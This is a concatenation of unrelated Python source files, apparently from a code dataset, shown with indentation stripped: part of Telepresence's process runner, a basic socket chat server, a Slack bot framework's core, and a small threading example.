self.show("Invoking sudo. Please enter your sudo password.")
try:
self.check_call(["sudo", "echo", "-n"])
except CalledProcessError:
raise self.fail("Unable to escalate privileges with sudo")
self.sudo_held = True
Thread(target=self._hold_sudo).start()
self.add_cleanup("Kill sudo privileges holder", self._drop_sudo)
# Dependencies
def depend(self, commands: typing.Iterable[str]) -> typing.List[str]:
"""
Find unavailable commands from a set of dependencies
"""
missing = []
for command in commands:
path = which(command)
if path:
self.write("Found {} -> {}".format(command, path))
else:
missing.append(command)
return missing
def require(self, commands: typing.Iterable[str], message: str) -> None:
"""
Verify that a set of dependencies (commands that can be called from the
shell) are available. Fail with an explanation if any is unavailable.
"""
missing = self.depend(commands)
if missing:
self.show("Required dependencies not found in your PATH:")
self.show(" {}".format(" ".join(missing)))
self.show(message)
raise self.fail(
"Please see " +
"https://www.telepresence.io/reference/install#dependencies " +
"for more information."
)
def require_docker(self) -> None:
self.require(["docker"], "Needed for the container method.")
# Check whether `sudo docker` is required.
# FIXME(ark3): This assumes a local docker. We check for that in a
# roundabout way elsewhere. Consider using `docker context inspect` to
# do all of this stuff in a way that may be supported.
dsock = "/var/run/docker.sock"
if os.path.exists(dsock) and not os.access(dsock, os.W_OK):
self.require_sudo()
self.sudo_for_docker = True
def docker(self, *args: str, env: bool = False) -> typing.List[str]:
if not self.sudo_for_docker:
return ["docker"] + list(args)
if env:
return ["sudo", "-E", "docker"] + list(args)
return ["sudo", "docker"] + list(args)
# Time
def time(self) -> float:
"""
Return the time in seconds since the epoch.
"""
return time()
def sleep(self, seconds: float) -> None:
"""
Suspend execution for the given number of seconds.
"""
sleep(seconds)
def loop_until(self, loop_seconds: float,
sleep_seconds: float) -> typing.Iterable[int]:
"""
Yield a loop counter during the loop time, then end. Sleep the
specified amount between loops. Always run at least once. Check for
background process early exit while looping.
:param loop_seconds: How long the loop should run
:param sleep_seconds: How long to sleep between loops
:return: yields the loop counter, 0 onward
"""
end_time = self.time() + loop_seconds - sleep_seconds
counter = 0
while True:
yield counter
if self.quitting:
self.bg_process_crash()
# Not reached
counter += 1
if self.time() >= end_time:
break
self.sleep(sleep_seconds)
# Subprocesses
def _make_logger(
self, track: int, do_log: bool, do_capture: bool, capture_limit: int
) -> _Logger:
"""Create a logger that optionally captures what is logged"""
prefix = "{:>3d}".format(track)
def write(line: str) -> None:
self.output.write(mask_sensitive_data(line), prefix=prefix)
return _Logger(write, do_log, do_capture, capture_limit)
def _run_command_sync(
self,
messages: typing.Tuple[str, str],
log_stdout: bool,
stderr_to_stdout: bool,
args: typing.List[str],
capture_limit: int,
timeout: typing.Optional[float],
input: typing.Optional[bytes],
env: typing.Optional[typing.Dict[str, str]],
) -> str:
"""
Run a command synchronously. Log stdout (optionally) and stderr (if not
redirected to stdout). Capture stdout and stderr, at least for
exceptions. Return output.
"""
self.counter = track = self.counter + 1
self.output.write(
"[{}] {}: {}".format(track, messages[0], str_command(args))
)
span = self.span(
"{} {}".format(track, str_command(args))[:80],
False,
verbose=False
)
kwargs = {} # type: typing.Dict[str, typing.Any]
if env is not None:
kwargs["env"] = env
if input is not None:
kwargs["input"] = input
# Set up capture/logging
out_logger = self._make_logger(
track, log_stdout or self.verbose, True, capture_limit
)
if stderr_to_stdout:
# This logger won't be used
err_logger = self._make_logger(track, False, False, capture_limit)
kwargs["stderr"] = STDOUT
else:
err_logger = self._make_logger(track, True, True, capture_limit)
# Launch the process and wait for it to finish
try:
process = _launch_command(args, out_logger, err_logger, **kwargs)
except OSError as exc:
# Failed to launch, so no need to wrap up capture stuff.
self.output.write("[{}] {}".format(track, exc))
raise
TIMED_OUT_RETCODE = -999
try:
retcode = process.wait(timeout)
except TimeoutExpired:
retcode = TIMED_OUT_RETCODE # sentinal for timeout
process.terminate()
try:
process.wait(timeout=1)
except TimeoutExpired:
process.kill()
process.wait()
output = out_logger.get_captured()
spent = span.end()
if retcode == TIMED_OUT_RETCODE:
# Command timed out. Need to raise TE.
self.output.write(
"[{}] timed out after {:0.2f} secs.".format(track, spent)
)
assert timeout is not None
raise TimeoutExpired(
args,
timeout,
output,
None if stderr_to_stdout else err_logger.get_captured(),
)
if retcode:
# Command failed. Need to raise CPE.
self.output.write(
"[{}] exit {} in {:0.2f} secs.".format(track, retcode, spent)
)
raise CalledProcessError(
retcode,
args,
output,
None if stderr_to_stdout else err_logger.get_captured(),
)
# Command succeeded. Just return the output
self.output.write(
"[{}] {} in {:0.2f} secs.".format(track, messages[1], spent)
)
return output
def check_call(
self,
args: typing.List[str],
timeout: typing.Optional[float] = None,
input: typing.Optional[bytes] = None,
env: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Run a subprocess, make sure it exited with 0."""
self._run_command_sync(
("Running", "ran"),
True,
False,
args,
10, # limited capture, only used for error reporting
timeout,
input,
env,
)
def get_output(
self,
args: typing.List[str],
timeout: typing.Optional[float] = None,
stderr_to_stdout: bool = False,
reveal: bool = False,
input: typing.Optional[bytes] = None,
env: typing.Optional[typing.Dict[str, str]] = None,
) -> str:
"""Return (stripped) command result as unicode string."""
output = self._run_command_sync(
("Capturing", "captured"),
reveal,
stderr_to_stdout,
args,
-1, # unlimited capture
timeout,
input,
env,
)
return output
def launch(
self,
name: str,
args: typing.List[str],
killer: typing.Optional[typing.Callable[[], None]] = None,
notify: bool = False,
keep_session: bool = False,
bufsize: int = -1,
is_critical: bool = True,
) -> None:
"""Asyncrounously run a process.
:param name: A human-friendly name to describe the process.
:param args: The command to run.
:param killer: How to signal to the process that it should
stop. The default is to call Popen.terminate(), which on
POSIX OSs sends SIGTERM.
:param notify: Whether to synchronously wait for the process
to send "READY=1" via the ``sd_notify(3)`` interface before
returning.
:param keep_session: Whether to run the process in the current
session (as in ``setsid()``), or in a new session. The
default is to run in a new session, in order to prevent
keyboard signals from getting forwarded. However, running in
a new session breaks sudo if it is configured to ask for a
password.
:parmam bufsize: See ``subprocess.Popen()`.
:param is_critical: Whether this process quitting should end this
Telepresence session. Default is True because that used to be the
only supported behavior.
:return: ``None``.
"""
self.counter = track = self.counter + 1
out_logger = self._make_logger(track, True, True, 10)
def done(proc: "Popen[str]") -> None:
retcode = proc.wait()
self.output.write("[{}] {}: exit {}".format(track, name, retcode))
recent = "\n ".join(out_logger.get_captured().split("\n"))
if recent:
recent = "\nRecent output was:\n {}".format(recent)
message = (
"Background process ({}) exited with return code {}. "
"Command was:\n {}\n{}"
).format(name, retcode, str_command(args), recent)
self.ended.append(message)
if is_critical:
# End the program because this is a critical subprocess
self.quitting = True
else:
# Record the failure but don't quit
self.output.write(message)
self.output.write(
"[{}] Launching {}: {}".format(track, name, str_command(args))
)
env = os.environ.copy()
if notify:
sockname = str(self.temp / "notify-{}".format(track))
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(sockname)
env["NOTIFY_SOCKET"] = sockname
try:
process = _launch_command(
args,
out_logger,
out_logger, # Won't be used
done=done,
# kwargs
start_new_session=not keep_session,
stderr=STDOUT,
bufsize=bufsize,
env=env
)
except OSError as exc:
self.output.write("[{}] {}".format(track, exc))
raise
if killer is None:
killer = partial(kill_process, process)
self.add_cleanup("Kill BG process [{}] {}".format(track, name), killer)
if notify:
# We need a select()able notification of death in case the
# process dies before sending READY=1. In C, I'd do this
# same pipe trick, but close the pipe from a SIGCHLD
# handler, which is lighter than a thread. But I fear
# that a SIGCHLD handler would interfere with the Python
# runtime? We're already using several threads per
# launched process, so what's the harm in one more?
pr, pw = os.pipe()
def pipewait() -> None:
process.wait()
os.close(pw)
Thread(target=pipewait, daemon=True).start()
# Block until either the process exits or we get a READY=1
# line on the socket.
while process.poll() is None:
r, _, x = select.select([pr, sock], [], [pr, sock])
if sock in r or sock in x:
lines = sock.recv(4096).decode("utf-8").split("\n")
if "READY=1" in lines:
break
os.close(pr)
sock.close()
# Cleanup
def add_cleanup(
self, name: str, callback: typing.Callable[..., None],
*args: typing.Any, **kwargs: typing.Any
) -> None:
"""
Set up callback to be called during cleanup processing on exit.
:param name: Logged for debugging
:param callback: What to call during cleanup
"""
cleanup_item = _CleanupItem(name, callback, args, kwargs)
self.cleanup_stack.append(cleanup_item)
def _signal_received(self, sig_num: int, frame: typing.Any) -> None:
try:
sig_name = signal.Signals(sig_num).name
except (ValueError, AttributeError):
sig_name = str(sig_num)
try:
frame_name = frame.f_code.co_name
except AttributeError:
frame_name = "(unknown)"
self.show(
"Received signal {} while in function {}".format(
sig_name, frame_name
)
)
self.exit(0)
def _do_cleanup(self) -> typing.List[typing.Tuple[str, BaseException]]:
failures = []
self.show("Exit cleanup in progress")
for name, callback, args, kwargs in reversed(self.cleanup_stack):
self.write("(Cleanup) {}".format(name))
try:
callback(*args, **kwargs)
except BaseException as exc:
self.write("(Cleanup) {} failed:".format(name))
self.write("(Cleanup) {}".format(exc))
failures.append((name, exc))
return failures
@contextmanager
def cleanup_handling(self) -> typing.Iterator[None]:
signal.signal(signal.SIGTERM, self._signal_received)
signal.signal(signal.SIGHUP, self._signal_received)
try:
yield
finally:
failures = self._do_cleanup()
if failures:
self.show("WARNING: Failures during cleanup. See above.")
# Exit
def bg_process_crash(self) -> None:
"""
Invoke the crash reporter, emitting additional information about the
background process early exit(s) that prompted this crash.
"""
self.quitting = True # should be a no-op
message = "{} background process(es) crashed".format(len(self.ended))
failures = "\n\n".join(self.ended)
raise BackgroundProcessCrash(message, failures)
def fail(self, message: str) -> SystemExit:
"""
Report failure to the user and exit. Does not return. Cleanup will run
before the process ends. This does not invoke the crash reporter; an
uncaught exception will achieve that, e.g., RuntimeError.
Failure is indicated with exit code 255 (like ssh). The user process's
exit code is propagated by successful sessions.
:param message: So the user knows what happened
"""
self.quitting = True
self.show("\n")
self.show(message)
self.show("\n")
code = 255
self.write("EXITING with status code {}".format(code))
exit(code)
return SystemExit(code) # Not reached; just here for the linters
def exit(self, code: int) -> SystemExit:
"""
Exit after a successful session. Does not return. Cleanup will run
before the process ends.
Success means exiting with the user process's exit code.
"""
self.quitting = True
Span.emit_summary = True
self.write("EXITING successful session.")
exit(code)
return SystemExit(code) # Not reached; just here for the linters
def wait_for_exit(self, main_process: "Popen[str]") -> None:
"""
Monitor main process and background items until done
"""
main_code = None
def wait_for_process(p: "Popen[str]") -> None:
"""Wait for process and set main_code and self.quitting flag
Note that main_code is defined in the parent function,
so it is declared as nonlocal
See https://github.com/telepresenceio/telepresence/issues/1003
"""
nonlocal main_code
main_code = p.wait()
self.quitting = True
self.write("Everything launched. Waiting to exit...")
span = self.span()
Thread(target=wait_for_process, args=(main_process, )).start()
while not self.quitting:
sleep(0.1)
span.end()
if main_code is not None:
# User process exited, we're done. Automatic shutdown cleanup
# will kill subprocesses.
main_command = str_command(str(arg) for arg in main_process.args)
self.write("Main process ({})".format(main_command))
self.write(" exited with code {}.".format(main_code))
message = "Your process "
if main_code:
message += "exited with return code {}.".format(main_code)
else:
message += "has exited."
self.show(message)
raise self.exit(main_code)
# Something else exited, setting the quitting flag.
# Unfortunately torsocks doesn't deal well with connections
# being lost, so best we can do is shut down.
if self.ended:
self.show("\n")
self.show_raw(self.ended[0])
self.show("\n")
message = (
"Proxy to Kubernetes exited. This is typically due to"
" a lost connection."
)
raise self.fail(message)
|
Server.py
|
import socket
from threading import Thread
import time
data = open("../assets/version.txt", "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host, port))
print(host, ip)
print("Ask clients to enter host IP as :", ip, "and port as :", port)
def accept_client():
while True:
client_con, client_address = s.accept()
client_con.send(
"Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8")
)
addresses[client_address] = client_address
t2 = Thread(target=handle_client, args=(client_con, client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") + message)
def handle_client(con, adr):
name = con.recv(1024).decode("utf8")
welcome_message = (
"Thanks for using this Chat Room "
+ name
+ ". You can use #quit if you want to exit"
)
con.send(bytes(welcome_message, "utf8"))
print(name, "has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while True:
message = con.recv(1024)
if message != bytes("#quit", "utf8"):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
|
core.py
|
import inspect
import logging
import sys
import time
from typing import Callable
from threading import Thread
import dill
from clint.textui import puts, indent, colored
from slack import RTMClient
from machine.vendor import bottle
from machine.dispatch import EventDispatcher
from machine.plugins.base import MachineBasePlugin
from machine.settings import import_settings
from machine.clients.singletons.scheduling import Scheduler
from machine.clients.singletons.storage import Storage
from machine.clients.slack import SlackClient
from machine.clients.singletons.slack import LowLevelSlackClient
from machine.storage import PluginStorage
from machine.utils.module_loading import import_string
from machine.utils.text import show_valid, show_invalid, warn, error, announce
logger = logging.getLogger(__name__)
def callable_with_sanitized_event(fn: Callable):
def sanitzed_call(**payload):
return fn(payload['data'])
return sanitzed_call
class Machine:
def __init__(self, settings=None):
announce("Initializing Slack Machine:")
with indent(4):
puts("Loading settings...")
if settings:
self._settings = settings
found_local_settings = True
else:
self._settings, found_local_settings = import_settings()
fmt = '[%(asctime)s][%(levelname)s] %(name)s %(filename)s:%(funcName)s:%(lineno)d |' \
' %(message)s'
date_fmt = '%Y-%m-%d %H:%M:%S'
log_level = self._settings.get('LOGLEVEL', logging.ERROR)
logging.basicConfig(
level=log_level,
format=fmt,
datefmt=date_fmt,
)
if not found_local_settings:
warn("No local_settings found! Are you sure this is what you want?")
if 'SLACK_API_TOKEN' not in self._settings:
error("No SLACK_API_TOKEN found in settings! I need that to work...")
sys.exit(1)
self._client = LowLevelSlackClient()
puts("Initializing storage using backend: {}".format(self._settings['STORAGE_BACKEND']))
self._storage = Storage.get_instance()
logger.debug("Storage initialized!")
self._plugin_actions = {
'listen_to': {},
'respond_to': {}
}
self._help = {
'human': {},
'robot': {}
}
self._dispatcher = EventDispatcher(self._plugin_actions, self._settings)
puts("Loading plugins...")
self.load_plugins()
logger.debug("The following plugin actions were registered: %s", self._plugin_actions)
def load_plugins(self):
with indent(4):
logger.debug("PLUGINS: %s", self._settings['PLUGINS'])
for plugin in self._settings['PLUGINS']:
for class_name, cls in import_string(plugin):
if issubclass(cls, MachineBasePlugin) and cls is not MachineBasePlugin:
logger.debug("Found a Machine plugin: {}".format(plugin))
storage = PluginStorage(class_name)
instance = cls(SlackClient(), self._settings, storage)
missing_settings = self._register_plugin(class_name, instance)
if missing_settings:
show_invalid(class_name)
with indent(4):
error_msg = "The following settings are missing: {}".format(
", ".join(missing_settings)
)
puts(colored.red(error_msg))
puts(colored.red("This plugin will not be loaded!"))
del instance
else:
instance.init()
show_valid(class_name)
self._storage.set('manual', dill.dumps(self._help))
def _register_plugin(self, plugin_class, cls_instance):
missing_settings = []
missing_settings.extend(self._check_missing_settings(cls_instance.__class__))
methods = inspect.getmembers(cls_instance, predicate=inspect.ismethod)
for _, fn in methods:
missing_settings.extend(self._check_missing_settings(fn))
if missing_settings:
return missing_settings
if cls_instance.__doc__:
class_help = cls_instance.__doc__.splitlines()[0]
else:
class_help = plugin_class
self._help['human'][class_help] = self._help['human'].get(class_help, {})
self._help['robot'][class_help] = self._help['robot'].get(class_help, [])
for name, fn in methods:
if hasattr(fn, 'metadata'):
self._register_plugin_actions(plugin_class, fn.metadata, cls_instance, name, fn,
class_help)
def _check_missing_settings(self, fn_or_class):
missing_settings = []
if hasattr(fn_or_class, 'metadata') and 'required_settings' in fn_or_class.metadata:
for setting in fn_or_class.metadata['required_settings']:
if setting not in self._settings:
missing_settings.append(setting.upper())
return missing_settings
def _register_plugin_actions(self, plugin_class, metadata, cls_instance, fn_name, fn,
class_help):
fq_fn_name = "{}.{}".format(plugin_class, fn_name)
if fn.__doc__:
self._help['human'][class_help][fq_fn_name] = self._parse_human_help(fn.__doc__)
for action, config in metadata['plugin_actions'].items():
if action == 'process':
event_type = config['event_type']
RTMClient.on(event=event_type, callback=callable_with_sanitized_event(fn))
if action in ['respond_to', 'listen_to']:
for regex in config['regex']:
event_handler = {
'class': cls_instance,
'class_name': plugin_class,
'function': fn,
'regex': regex
}
key = "{}-{}".format(fq_fn_name, regex.pattern)
self._plugin_actions[action][key] = event_handler
self._help['robot'][class_help].append(self._parse_robot_help(regex, action))
if action == 'schedule':
Scheduler.get_instance().add_job(fq_fn_name, trigger='cron', args=[cls_instance],
id=fq_fn_name, replace_existing=True, **config)
if action == 'route':
for route_config in config:
bottle.route(**route_config)(fn)
@staticmethod
def _parse_human_help(doc):
summary = doc.splitlines()[0].split(':')
if len(summary) > 1:
command = summary[0].strip()
cmd_help = summary[1].strip()
else:
command = "??"
cmd_help = summary[0].strip()
return {
'command': command,
'help': cmd_help
}
@staticmethod
def _parse_robot_help(regex, action):
if action == 'respond_to':
return "@botname {}".format(regex.pattern)
else:
return regex.pattern
def _keepalive(self):
while True:
time.sleep(self._settings['KEEP_ALIVE'])
self._client.ping()
logger.debug("Client Ping!")
def run(self):
announce("\nStarting Slack Machine:")
with indent(4):
show_valid("Connected to Slack")
Scheduler.get_instance().start()
show_valid("Scheduler started")
if not self._settings['DISABLE_HTTP']:
self._bottle_thread = Thread(
target=bottle.run,
kwargs=dict(
host=self._settings['HTTP_SERVER_HOST'],
port=self._settings['HTTP_SERVER_PORT'],
server=self._settings['HTTP_SERVER_BACKEND'],
)
)
self._bottle_thread.daemon = True
self._bottle_thread.start()
show_valid("Web server started")
if self._settings['KEEP_ALIVE']:
self._keep_alive_thread = Thread(target=self._keepalive)
self._keep_alive_thread.daemon = True
self._keep_alive_thread.start()
show_valid(
"Keepalive thread started [Interval: %ss]" % self._settings['KEEP_ALIVE']
)
show_valid("Dispatcher started")
self._dispatcher.start()
|
t.py
|
import logging
import threading
import time
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(20)
logging.info("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.